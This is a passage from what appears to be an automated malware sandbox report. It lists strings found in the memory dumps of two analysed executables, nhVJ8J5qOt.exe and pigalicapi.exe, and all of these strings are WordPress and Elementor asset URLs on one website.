nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/headro
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/lottie
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/premiu
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor-child/ctc-style.css?ver=2.7.1.1683646291
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/assets/js/hello-frontend.min.js?ver=1.0.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/style.min.css?ver=2.7.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.7.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/custom-jet-blocks.css?ver=1.3.6
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/global.css?ver=1685626299
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-11.css?ver=1685626299
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-1395.css?ver=1685626300
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-2274.css?ver=1685626299
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-42.css?ver=1687848515
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-46.css?ver=1685626299
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-6.css?ver=1685626312
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-638.css?ver=1685626300
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?ver
